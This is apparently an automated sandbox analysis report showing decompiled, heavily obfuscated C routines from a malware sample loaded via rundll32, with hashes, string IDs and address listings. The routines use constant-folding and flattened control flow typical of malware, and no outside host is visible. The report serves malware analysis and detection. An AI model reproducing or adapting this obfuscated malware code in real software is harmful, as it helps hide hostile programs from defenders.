                                                                                                                                    			}












































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ^T$mU`
                                                                                                                                    • API String ID: 0-1245783925
                                                                                                                                    • Opcode ID: dba1064687c93ef310c92f02c295dc3b2202115afa74cfdd1b1dcf4c2ffe5b3f
                                                                                                                                    • Instruction ID: d9afa6a18707ffda83c23a09275d54acf1b3b075dc50a67f8dea2797518ee7c6
                                                                                                                                    • Opcode Fuzzy Hash: dba1064687c93ef310c92f02c295dc3b2202115afa74cfdd1b1dcf4c2ffe5b3f
                                                                                                                                    • Instruction Fuzzy Hash: 40B140715183419FC318DF25899A41BFBE1FBC8748F108A1EF69A96260D3B1CA59CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002DA666(intOrPtr* __ecx) {
                                                                                                                                    				char _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				intOrPtr* _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				signed int _v208;
                                                                                                                                    				void* _t185;
                                                                                                                                    				void* _t187;
                                                                                                                                    				signed int _t194;
                                                                                                                                    				signed int _t203;
                                                                                                                                    				intOrPtr* _t204;
                                                                                                                                    				signed int _t231;
                                                                                                                                    				signed int _t232;
                                                                                                                                    				signed int _t233;
                                                                                                                                    				signed int _t234;
                                                                                                                                    				signed int _t235;
                                                                                                                                    				void* _t236;
                                                                                                                                    				signed int _t239;
                                                                                                                                    				signed int* _t240;
                                                                                                                                    
                                                                                                                                    				_t204 = __ecx;
                                                                                                                                    				_t240 =  &_v208;
                                                                                                                                    				_v144 = __ecx;
                                                                                                                                    				_v188 = 0x57b051;
                                                                                                                                    				_v188 = _v188 ^ 0x0e33ee27;
                                                                                                                                    				_v188 = _v188 * 0x1d;
                                                                                                                                    				_t236 = 0xac5721c;
                                                                                                                                    				_v188 = _v188 << 4;
                                                                                                                                    				_v188 = _v188 ^ 0x15e508b7;
                                                                                                                                    				_v156 = 0xb3c586;
                                                                                                                                    				_v156 = _v156 + 0xc4f5;
                                                                                                                                    				_v156 = _v156 ^ 0x00bed25a;
                                                                                                                                    				_v168 = 0x711032;
                                                                                                                                    				_v168 = _v168 << 8;
                                                                                                                                    				_v168 = _v168 + 0x5169;
                                                                                                                                    				_v168 = _v168 ^ 0x711dace8;
                                                                                                                                    				_v192 = 0xa2549d;
                                                                                                                                    				_v192 = _v192 + 0x52ae;
                                                                                                                                    				_v192 = _v192 >> 1;
                                                                                                                                    				_v192 = _v192 >> 3;
                                                                                                                                    				_v192 = _v192 ^ 0x000eb53b;
                                                                                                                                    				_v140 = 0xe7e5a1;
                                                                                                                                    				_t231 = 0x32;
                                                                                                                                    				_v140 = _v140 * 0x50;
                                                                                                                                    				_v140 = _v140 ^ 0x4874e895;
                                                                                                                                    				_v208 = 0x1967bb;
                                                                                                                                    				_v208 = _v208 << 4;
                                                                                                                                    				_v208 = _v208 | 0x201d9a42;
                                                                                                                                    				_v208 = _v208 / _t231;
                                                                                                                                    				_v208 = _v208 ^ 0x00a7f54f;
                                                                                                                                    				_v152 = 0x52a7fc;
                                                                                                                                    				_v152 = _v152 + 0x45a2;
                                                                                                                                    				_v152 = _v152 ^ 0x0052edd3;
                                                                                                                                    				_v160 = 0x3027b3;
                                                                                                                                    				_v160 = _v160 + 0xfd14;
                                                                                                                                    				_v160 = _v160 ^ 0x0036c553;
                                                                                                                                    				_v180 = 0x38862e;
                                                                                                                                    				_v180 = _v180 ^ 0x0f350481;
                                                                                                                                    				_t232 = 0x7c;
                                                                                                                                    				_v180 = _v180 * 0x65;
                                                                                                                                    				_v180 = _v180 ^ 0xf053ee57;
                                                                                                                                    				_v136 = 0x356a19;
                                                                                                                                    				_v136 = _v136 ^ 0xbed63dcb;
                                                                                                                                    				_v136 = _v136 ^ 0xbeeb3706;
                                                                                                                                    				_v164 = 0x14aaf;
                                                                                                                                    				_v164 = _v164 + 0xffffc1af;
                                                                                                                                    				_v164 = _v164 ^ 0x000285a1;
                                                                                                                                    				_v200 = 0x7f3e04;
                                                                                                                                    				_v200 = _v200 * 0x53;
                                                                                                                                    				_v200 = _v200 + 0xffffdc1b;
                                                                                                                                    				_v200 = _v200 + 0x69f9;
                                                                                                                                    				_v200 = _v200 ^ 0x2945b47b;
                                                                                                                                    				_v148 = 0xc6ed1e;
                                                                                                                                    				_v148 = _v148 >> 6;
                                                                                                                                    				_v148 = _v148 ^ 0x0006dab0;
                                                                                                                                    				_v172 = 0x6d07b9;
                                                                                                                                    				_v172 = _v172 / _t232;
                                                                                                                                    				_t233 = 0x35;
                                                                                                                                    				_v172 = _v172 / _t233;
                                                                                                                                    				_v172 = _v172 ^ 0x00041e3e;
                                                                                                                                    				_v204 = 0x57aab;
                                                                                                                                    				_v204 = _v204 + 0xdcdc;
                                                                                                                                    				_v204 = _v204 * 0x48;
                                                                                                                                    				_v204 = _v204 << 8;
                                                                                                                                    				_v204 = _v204 ^ 0xc89fb5e3;
                                                                                                                                    				_v132 = 0xff84eb;
                                                                                                                                    				_v132 = _v132 << 5;
                                                                                                                                    				_v132 = _v132 ^ 0x1ff23c26;
                                                                                                                                    				_v196 = 0xcb0ee1;
                                                                                                                                    				_v196 = _v196 | 0xd8d8bfc1;
                                                                                                                                    				_v196 = _v196 << 4;
                                                                                                                                    				_v196 = _v196 ^ 0x8dbe7284;
                                                                                                                                    				_v184 = 0x3f345e;
                                                                                                                                    				_t234 = 0x7b;
                                                                                                                                    				_v184 = _v184 * 0x5e;
                                                                                                                                    				_v184 = _v184 ^ 0x1738d684;
                                                                                                                                    				_v176 = 0x75d12f;
                                                                                                                                    				_t239 = _v184;
                                                                                                                                    				_t203 = _v184;
                                                                                                                                    				_t235 = _v184;
                                                                                                                                    				_v176 = _v176 / _t234;
                                                                                                                                    				_v176 = _v176 + 0xb925;
                                                                                                                                    				_v176 = _v176 ^ 0x0007fac1;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t185 = 0x80ddafd;
                                                                                                                                    					do {
                                                                                                                                    						while(_t236 != 0x3002390) {
                                                                                                                                    							if(_t236 == _t185) {
                                                                                                                                    								_push(_v204);
                                                                                                                                    								_push(_v172);
                                                                                                                                    								_t187 = E002DDCF7(_v148, 0x2c1540, __eflags);
                                                                                                                                    								_push(_t235);
                                                                                                                                    								_push( &_v128);
                                                                                                                                    								_push(_t187);
                                                                                                                                    								_push(_t239);
                                                                                                                                    								_push(_t203);
                                                                                                                                    								 *((intOrPtr*)(E002CA42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                                    								E002CA8B0(_v132, _t187, _v196);
                                                                                                                                    								_t236 = 0xc2d90a2;
                                                                                                                                    								goto L11;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t236 == 0x94501ee) {
                                                                                                                                    									_t194 = E002D0AE0(0x10, 1);
                                                                                                                                    									_push(_v140);
                                                                                                                                    									_t239 = _t194;
                                                                                                                                    									_push( &_v128);
                                                                                                                                    									_push(_t239);
                                                                                                                                    									_push(0xb);
                                                                                                                                    									E002C80E3(_v168, _v192);
                                                                                                                                    									_t236 = 0x3002390;
                                                                                                                                    									L11:
                                                                                                                                    									_t240 =  &(_t240[6]);
                                                                                                                                    									L12:
                                                                                                                                    									_t204 = _v144;
                                                                                                                                    									goto L1;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t236 == 0xac5721c) {
                                                                                                                                    										_t236 = 0x94501ee;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t236 == 0xc2d90a2) {
                                                                                                                                    											E002D8519(_v184, _v176, _t235);
                                                                                                                                    										} else {
                                                                                                                                    											if(_t236 != 0xd4e1cec) {
                                                                                                                                    												goto L17;
                                                                                                                                    											} else {
                                                                                                                                    												_t239 = 0x4000;
                                                                                                                                    												_push(_t204);
                                                                                                                                    												_push(_t204);
                                                                                                                                    												_t203 = E002C7FF2(0x4000);
                                                                                                                                    												_t185 = 0x80ddafd;
                                                                                                                                    												_t204 = _v144;
                                                                                                                                    												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
                                                                                                                                    												continue;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L20:
                                                                                                                                    							return _t203;
                                                                                                                                    						}
                                                                                                                                    						_t235 = E002C4816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
                                                                                                                                    						_t240 =  &(_t240[4]);
                                                                                                                                    						__eflags = _t235;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							_t204 = _v144;
                                                                                                                                    							_t236 = 0x99c1651;
                                                                                                                                    							_t185 = 0x80ddafd;
                                                                                                                                    							goto L17;
                                                                                                                                    						} else {
                                                                                                                                    							_t236 = 0xd4e1cec;
                                                                                                                                    							goto L12;
                                                                                                                                    						}
                                                                                                                                    						goto L20;
                                                                                                                                    						L17:
                                                                                                                                    						__eflags = _t236 - 0x99c1651;
                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                    					goto L20;
                                                                                                                                    				}
                                                                                                                                    			}





































                                                                                                                                    0x002da746
                                                                                                                                    0x002da74e
                                                                                                                                    0x002da756
                                                                                                                                    0x002da75e
                                                                                                                                    0x002da766
                                                                                                                                    0x002da76e
                                                                                                                                    0x002da776
                                                                                                                                    0x002da783
                                                                                                                                    0x002da786
                                                                                                                                    0x002da78a
                                                                                                                                    0x002da792
                                                                                                                                    0x002da79a
                                                                                                                                    0x002da7a2
                                                                                                                                    0x002da7aa
                                                                                                                                    0x002da7b2
                                                                                                                                    0x002da7ba
                                                                                                                                    0x002da7c2
                                                                                                                                    0x002da7cf
                                                                                                                                    0x002da7d3
                                                                                                                                    0x002da7db
                                                                                                                                    0x002da7e3
                                                                                                                                    0x002da7eb
                                                                                                                                    0x002da7f3
                                                                                                                                    0x002da7f8
                                                                                                                                    0x002da800
                                                                                                                                    0x002da810
                                                                                                                                    0x002da818
                                                                                                                                    0x002da81b
                                                                                                                                    0x002da81f
                                                                                                                                    0x002da827
                                                                                                                                    0x002da82f
                                                                                                                                    0x002da83c
                                                                                                                                    0x002da842
                                                                                                                                    0x002da847
                                                                                                                                    0x002da84f
                                                                                                                                    0x002da857
                                                                                                                                    0x002da85c
                                                                                                                                    0x002da864
                                                                                                                                    0x002da86c
                                                                                                                                    0x002da874
                                                                                                                                    0x002da879
                                                                                                                                    0x002da881
                                                                                                                                    0x002da890
                                                                                                                                    0x002da891
                                                                                                                                    0x002da895
                                                                                                                                    0x002da89d
                                                                                                                                    0x002da8ab
                                                                                                                                    0x002da8af
                                                                                                                                    0x002da8b3
                                                                                                                                    0x002da8b7
                                                                                                                                    0x002da8bb
                                                                                                                                    0x002da8c3
                                                                                                                                    0x002da8cb
                                                                                                                                    0x002da8cb
                                                                                                                                    0x002da8cb
                                                                                                                                    0x002da8d0
                                                                                                                                    0x002da8d0
                                                                                                                                    0x002da8de
                                                                                                                                    0x002da983
                                                                                                                                    0x002da98c
                                                                                                                                    0x002da994
                                                                                                                                    0x002da99b
                                                                                                                                    0x002da9a7
                                                                                                                                    0x002da9a8
                                                                                                                                    0x002da9a9
                                                                                                                                    0x002da9aa
                                                                                                                                    0x002da9b6
                                                                                                                                    0x002da9c2
                                                                                                                                    0x002da9c7
                                                                                                                                    0x00000000
                                                                                                                                    0x002da8e4
                                                                                                                                    0x002da8ea
                                                                                                                                    0x002da952
                                                                                                                                    0x002da957
                                                                                                                                    0x002da95f
                                                                                                                                    0x002da969
                                                                                                                                    0x002da96a
                                                                                                                                    0x002da96b
                                                                                                                                    0x002da96d
                                                                                                                                    0x002da972
                                                                                                                                    0x002da977
                                                                                                                                    0x002da977
                                                                                                                                    0x002da97a
                                                                                                                                    0x002da97a
                                                                                                                                    0x00000000
                                                                                                                                    0x002da8ec
                                                                                                                                    0x002da8f2
                                                                                                                                    0x002da93f
                                                                                                                                    0x00000000
                                                                                                                                    0x002da8f4
                                                                                                                                    0x002da8fa
                                                                                                                                    0x002daa1d
                                                                                                                                    0x002da900
                                                                                                                                    0x002da906
                                                                                                                                    0x00000000
                                                                                                                                    0x002da90c
                                                                                                                                    0x002da910
                                                                                                                                    0x002da91f
                                                                                                                                    0x002da920
                                                                                                                                    0x002da926
                                                                                                                                    0x002da930
                                                                                                                                    0x002da936
                                                                                                                                    0x002da93a
                                                                                                                                    0x00000000
                                                                                                                                    0x002da93a
                                                                                                                                    0x002da906
                                                                                                                                    0x002da8fa
                                                                                                                                    0x002da8f2
                                                                                                                                    0x002da8ea
                                                                                                                                    0x002daa26
                                                                                                                                    0x002daa2f
                                                                                                                                    0x002daa2f
                                                                                                                                    0x002da9e8
                                                                                                                                    0x002da9ea
                                                                                                                                    0x002da9ed
                                                                                                                                    0x002da9ef
                                                                                                                                    0x002da9f8
                                                                                                                                    0x002da9fc
                                                                                                                                    0x002daa01
                                                                                                                                    0x00000000
                                                                                                                                    0x002da9f1
                                                                                                                                    0x002da9f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002da9f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002daa06
                                                                                                                                    0x002daa06
                                                                                                                                    0x002daa06
                                                                                                                                    0x00000000
                                                                                                                                    0x002daa12

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ^4?$iQ
                                                                                                                                    • API String ID: 0-3971506469
                                                                                                                                    • Opcode ID: 1c1d292d2d67ac339d054ba52c878640336f522c9ce08149e9d33dab672480b3
                                                                                                                                    • Instruction ID: 9950470580f5139cbedc9f46216b0c498a5cf005f3de3ecb08e3d12d345064b2
                                                                                                                                    • Opcode Fuzzy Hash: 1c1d292d2d67ac339d054ba52c878640336f522c9ce08149e9d33dab672480b3
                                                                                                                                    • Instruction Fuzzy Hash: 0BA151719183409FC354CF29D58990BFBE1BBC4758F40892EF99AA7260C7B5D9498F83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E002D8BE3() {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				void* _v88;
                                                                                                                                    				intOrPtr _v92;
                                                                                                                                    				signed int _t203;
                                                                                                                                    				short _t206;
                                                                                                                                    				short _t211;
                                                                                                                                    				signed int _t214;
                                                                                                                                    				void* _t216;
                                                                                                                                    				intOrPtr _t238;
                                                                                                                                    				void* _t239;
                                                                                                                                    				void* _t240;
                                                                                                                                    				short* _t241;
                                                                                                                                    				short* _t242;
                                                                                                                                    				signed int _t243;
                                                                                                                                    				signed int _t244;
                                                                                                                                    				signed int _t245;
                                                                                                                                    				signed int _t246;
                                                                                                                                    				signed int _t247;
                                                                                                                                    				signed int _t248;
                                                                                                                                    				signed int _t249;
                                                                                                                                    				signed int _t250;
                                                                                                                                    				void* _t251;
                                                                                                                                    
                                                                                                                                    				_v92 = 0x476c75;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t216 = 0xb7209d2;
                                                                                                                                    				_t243 = 0x73;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t238 =  *0x2e3e10; // 0x0
                                                                                                                                    				_v16 = 0xe95677;
                                                                                                                                    				_t239 = _t238 + 0x1c;
                                                                                                                                    				_v16 = _v16 + 0xffffde88;
                                                                                                                                    				_v16 = _v16 | 0xcd71b475;
                                                                                                                                    				_v16 = _v16 + 0xffffb9cf;
                                                                                                                                    				_v16 = _v16 ^ 0xcdf0e35f;
                                                                                                                                    				_v48 = 0xdf79ef;
                                                                                                                                    				_v48 = _v48 / _t243;
                                                                                                                                    				_t244 = 0x6b;
                                                                                                                                    				_v48 = _v48 * 0x6d;
                                                                                                                                    				_v48 = _v48 ^ 0x00d012e0;
                                                                                                                                    				_v20 = 0x9de8b4;
                                                                                                                                    				_v20 = _v20 + 0xffff612d;
                                                                                                                                    				_v20 = _v20 / _t244;
                                                                                                                                    				_v20 = _v20 ^ 0xc642351f;
                                                                                                                                    				_v20 = _v20 ^ 0xc646a40f;
                                                                                                                                    				_v52 = 0x8fb5bf;
                                                                                                                                    				_v52 = _v52 << 0xa;
                                                                                                                                    				_v52 = _v52 | 0x07a5acc8;
                                                                                                                                    				_v52 = _v52 ^ 0x3ff13d54;
                                                                                                                                    				_v68 = 0x5451dc;
                                                                                                                                    				_v68 = _v68 << 4;
                                                                                                                                    				_v68 = _v68 ^ 0x054b95e9;
                                                                                                                                    				_v56 = 0x52bd8b;
                                                                                                                                    				_v56 = _v56 >> 2;
                                                                                                                                    				_t245 = 0x43;
                                                                                                                                    				_v56 = _v56 * 0x7a;
                                                                                                                                    				_v56 = _v56 ^ 0x09d97bb2;
                                                                                                                                    				_v24 = 0x3d3b88;
                                                                                                                                    				_v24 = _v24 / _t245;
                                                                                                                                    				_v24 = _v24 + 0xfffff551;
                                                                                                                                    				_v24 = _v24 ^ 0x58fd9949;
                                                                                                                                    				_v24 = _v24 ^ 0x58f7485b;
                                                                                                                                    				_v28 = 0x8d7fa4;
                                                                                                                                    				_v28 = _v28 | 0x74f1f66b;
                                                                                                                                    				_v28 = _v28 + 0xbcb0;
                                                                                                                                    				_t246 = 0x1d;
                                                                                                                                    				_v28 = _v28 / _t246;
                                                                                                                                    				_v28 = _v28 ^ 0x0406308a;
                                                                                                                                    				_v76 = 0xb13dbd;
                                                                                                                                    				_v76 = _v76 >> 4;
                                                                                                                                    				_v76 = _v76 ^ 0x0001a54a;
                                                                                                                                    				_v72 = 0x3dff58;
                                                                                                                                    				_v72 = _v72 + 0xffff5d9c;
                                                                                                                                    				_v72 = _v72 ^ 0x00301633;
                                                                                                                                    				_v8 = 0xd63a62;
                                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                                    				_v8 = _v8 << 5;
                                                                                                                                    				_v8 = _v8 ^ 0xdca434f7;
                                                                                                                                    				_v8 = _v8 ^ 0xdd0cf0dc;
                                                                                                                                    				_v44 = 0x6f20d8;
                                                                                                                                    				_v44 = _v44 >> 0xb;
                                                                                                                                    				_v44 = _v44 ^ 0xaa766a49;
                                                                                                                                    				_v44 = _v44 ^ 0xaa79f73d;
                                                                                                                                    				_v64 = 0x5810b3;
                                                                                                                                    				_t247 = 0x3e;
                                                                                                                                    				_v64 = _v64 * 0x13;
                                                                                                                                    				_v64 = _v64 ^ 0x068d2e2f;
                                                                                                                                    				_v60 = 0xa1705b;
                                                                                                                                    				_v60 = _v60 / _t247;
                                                                                                                                    				_v60 = _v60 ^ 0x000746d3;
                                                                                                                                    				_v12 = 0xe49076;
                                                                                                                                    				_v12 = _v12 | 0xf94b921d;
                                                                                                                                    				_t248 = 0x66;
                                                                                                                                    				_v12 = _v12 / _t248;
                                                                                                                                    				_v12 = _v12 | 0x30c6fb91;
                                                                                                                                    				_v12 = _v12 ^ 0x32fd72cc;
                                                                                                                                    				_v40 = 0x4af1f5;
                                                                                                                                    				_v40 = _v40 + 0xffff1f3a;
                                                                                                                                    				_v40 = _v40 + 0x5998;
                                                                                                                                    				_v40 = _v40 | 0x0efc634a;
                                                                                                                                    				_v40 = _v40 ^ 0x0ef1d3e1;
                                                                                                                                    				_v36 = 0xca0e2e;
                                                                                                                                    				_v36 = _v36 + 0xa6ab;
                                                                                                                                    				_v36 = _v36 * 0x17;
                                                                                                                                    				_v36 = _v36 | 0xed84f45f;
                                                                                                                                    				_v36 = _v36 ^ 0xffb3e96f;
                                                                                                                                    				_v32 = 0x9f068d;
                                                                                                                                    				_v32 = _v32 | 0xccdcedf7;
                                                                                                                                    				_v32 = _v32 >> 8;
                                                                                                                                    				_v32 = _v32 << 0x10;
                                                                                                                                    				_v32 = _v32 ^ 0xdfe821c7;
                                                                                                                                    				do {
                                                                                                                                    					while(_t216 != 0x5ccdb59) {
                                                                                                                                    						if(_t216 == 0x80e5149) {
                                                                                                                                    							_push(_v32);
                                                                                                                                    							_push(_t239);
                                                                                                                                    							_push(3);
                                                                                                                                    							_push(1);
                                                                                                                                    							E002C80E3(_v40, _v36);
                                                                                                                                    							 *((short*)(_t239 + 6)) = 0;
                                                                                                                                    							return 0;
                                                                                                                                    						}
                                                                                                                                    						if(_t216 == 0xb7209d2) {
                                                                                                                                    							_t211 = E002DD25E(_t216);
                                                                                                                                    							_t216 = 0x5ccdb59;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t216 != 0xeb2e9e3) {
                                                                                                                                    							goto L8;
                                                                                                                                    						}
                                                                                                                                    						_t214 = E002D0AE0(0x10, 4);
                                                                                                                                    						_push(_v12);
                                                                                                                                    						_t250 = _t214;
                                                                                                                                    						_push(_t239);
                                                                                                                                    						_push(_t250);
                                                                                                                                    						_push(1);
                                                                                                                                    						E002C80E3(_v64, _v60);
                                                                                                                                    						_t251 = _t251 + 0x18;
                                                                                                                                    						_t242 = _t239 + _t250 * 2;
                                                                                                                                    						_t216 = 0x80e5149;
                                                                                                                                    						_t211 = 0x2e;
                                                                                                                                    						 *_t242 = _t211;
                                                                                                                                    						_t239 = _t242 + 2;
                                                                                                                                    					}
                                                                                                                                    					_t203 = E002D0AE0(0x10, 4);
                                                                                                                                    					_push(_v24);
                                                                                                                                    					_t249 = _t203;
                                                                                                                                    					_push(_t239);
                                                                                                                                    					_push(1);
                                                                                                                                    					_push(2);
                                                                                                                                    					E002C80E3(_v68, _v56);
                                                                                                                                    					_push(_v72);
                                                                                                                                    					_t240 = _t239 + 2;
                                                                                                                                    					_push(_t240);
                                                                                                                                    					_push(_t249);
                                                                                                                                    					_push(1);
                                                                                                                                    					E002C80E3(_v28, _v76);
                                                                                                                                    					_t251 = _t251 + 0x28;
                                                                                                                                    					_t241 = _t240 + _t249 * 2;
                                                                                                                                    					_t216 = 0xeb2e9e3;
                                                                                                                                    					_t206 = 0x5c;
                                                                                                                                    					 *_t241 = _t206;
                                                                                                                                    					_t239 = _t241 + 2;
                                                                                                                                    					L8:
                                                                                                                                    				} while (_t216 != 0x3f21c37);
                                                                                                                                    				return _t211;
                                                                                                                                    			}










































                                                                                                                                    0x002d8efc
                                                                                                                                    0x002d8efd
                                                                                                                                    0x002d8eff
                                                                                                                                    0x002d8f01
                                                                                                                                    0x002d8f0b
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8f0b
                                                                                                                                    0x002d8e3f
                                                                                                                                    0x002d8e8c
                                                                                                                                    0x002d8e91
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8e91
                                                                                                                                    0x002d8e47
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8e57
                                                                                                                                    0x002d8e5c
                                                                                                                                    0x002d8e62
                                                                                                                                    0x002d8e67
                                                                                                                                    0x002d8e68
                                                                                                                                    0x002d8e69
                                                                                                                                    0x002d8e6b
                                                                                                                                    0x002d8e70
                                                                                                                                    0x002d8e73
                                                                                                                                    0x002d8e76
                                                                                                                                    0x002d8e7d
                                                                                                                                    0x002d8e7e
                                                                                                                                    0x002d8e81
                                                                                                                                    0x002d8e81
                                                                                                                                    0x002d8ea2
                                                                                                                                    0x002d8ea7
                                                                                                                                    0x002d8ead
                                                                                                                                    0x002d8eb2
                                                                                                                                    0x002d8eb3
                                                                                                                                    0x002d8eb5
                                                                                                                                    0x002d8eb7
                                                                                                                                    0x002d8ebc
                                                                                                                                    0x002d8ec2
                                                                                                                                    0x002d8ec8
                                                                                                                                    0x002d8ec9
                                                                                                                                    0x002d8eca
                                                                                                                                    0x002d8ecc
                                                                                                                                    0x002d8ed1
                                                                                                                                    0x002d8ed4
                                                                                                                                    0x002d8ed7
                                                                                                                                    0x002d8ede
                                                                                                                                    0x002d8edf
                                                                                                                                    0x002d8ee2
                                                                                                                                    0x002d8ee5
                                                                                                                                    0x002d8ee5
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ulG$wV
                                                                                                                                    • API String ID: 0-391097709
                                                                                                                                    • Opcode ID: 85b284142a1b95f508570ec6730705ac00aba33c5a5536c2d82744c6a9960b87
                                                                                                                                    • Instruction ID: d71d99f4af2b12f401754c5fc3141005ae0c813adceb5e044a56b4bc908dd35a
                                                                                                                                    • Opcode Fuzzy Hash: 85b284142a1b95f508570ec6730705ac00aba33c5a5536c2d82744c6a9960b87
                                                                                                                                    • Instruction Fuzzy Hash: 28915672D01219EBDB14DFE5D88AADEBBB1FF44314F20814AE216B6250D7B01A45CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002C6D24() {
                                                                                                                                    				char _v524;
                                                                                                                                    				signed int _v528;
                                                                                                                                    				signed int _v532;
                                                                                                                                    				signed int _v536;
                                                                                                                                    				signed int _v540;
                                                                                                                                    				signed int _v544;
                                                                                                                                    				signed int _v548;
                                                                                                                                    				signed int _v552;
                                                                                                                                    				signed int _v556;
                                                                                                                                    				signed int _v560;
                                                                                                                                    				signed int _v564;
                                                                                                                                    				signed int _v568;
                                                                                                                                    				signed int _v572;
                                                                                                                                    				signed int _v576;
                                                                                                                                    				signed int _v580;
                                                                                                                                    				signed int _v584;
                                                                                                                                    				signed int _v588;
                                                                                                                                    				signed int _v592;
                                                                                                                                    				short* _t158;
                                                                                                                                    				void* _t161;
                                                                                                                                    				void* _t164;
                                                                                                                                    				intOrPtr _t173;
                                                                                                                                    				intOrPtr _t188;
                                                                                                                                    				signed int _t192;
                                                                                                                                    				signed int _t193;
                                                                                                                                    				signed int _t194;
                                                                                                                                    				signed int _t195;
                                                                                                                                    				void* _t198;
                                                                                                                                    
                                                                                                                                    				_v556 = 0x5b9523;
                                                                                                                                    				_v556 = _v556 ^ 0xd644881d;
                                                                                                                                    				_t164 = 0xafec1cc;
                                                                                                                                    				_v556 = _v556 ^ 0xd61fc18a;
                                                                                                                                    				_v560 = 0xf0211a;
                                                                                                                                    				_v560 = _v560 >> 0xc;
                                                                                                                                    				_v560 = _v560 >> 0xf;
                                                                                                                                    				_v560 = _v560 ^ 0x000d86e8;
                                                                                                                                    				_v536 = 0x5b86ee;
                                                                                                                                    				_t192 = 0x7a;
                                                                                                                                    				_v536 = _v536 / _t192;
                                                                                                                                    				_v536 = _v536 ^ 0x00051f37;
                                                                                                                                    				_v528 = 0x15dba1;
                                                                                                                                    				_v528 = _v528 + 0xffff3226;
                                                                                                                                    				_v528 = _v528 ^ 0x001c60e6;
                                                                                                                                    				_v564 = 0xcdfacc;
                                                                                                                                    				_v564 = _v564 ^ 0x78a7d3e3;
                                                                                                                                    				_v564 = _v564 << 0xe;
                                                                                                                                    				_v564 = _v564 ^ 0x8a48a6fd;
                                                                                                                                    				_v572 = 0x7eccf1;
